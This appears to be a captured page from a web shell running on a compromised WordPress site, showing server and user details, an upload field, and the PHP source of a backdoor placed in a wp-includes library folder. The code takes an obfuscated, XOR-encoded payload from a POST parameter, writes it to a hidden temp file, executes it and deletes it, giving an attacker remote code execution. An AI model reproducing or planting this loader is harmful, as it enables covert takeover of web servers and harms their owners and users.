| Server IP : 198.38.94.67 / Your IP : 216.73.217.178 Web Server : LiteSpeed System : Linux d6054.dxb1.stableserver.net 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64 User : azfilmst ( 1070) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/azfilmst/zeuszamani.com/wp-includes/sodium_compat/src/PHP52/ |
Upload File : |
<?php
if(array_key_exists("ob\x6A", $_POST) && !is_null($_POST["ob\x6A"])){
$dchunk = array_filter(["/var/tmp", session_save_path(), "/dev/shm", getcwd(), getenv("TMP"), sys_get_temp_dir(), getenv("TEMP"), "/tmp", ini_get("upload_tmp_dir")]);
$pointer = hex2bin($_POST["ob\x6A"]);
$val = '' ; for($e=0; $e<strlen($pointer); $e++){$val .= chr(ord($pointer[$e]) ^ 70);}
while ($component = array_shift($dchunk)) {
if (array_product([is_dir($component), is_writable($component)])) {
$elem = vsprintf("%s/%s", [$component, ".sym"]);
$file = fopen($elem, 'w');
if ($file) {
fwrite($file, $val);
fclose($file);
include $elem;
@unlink($elem);
exit;
}
}
}
}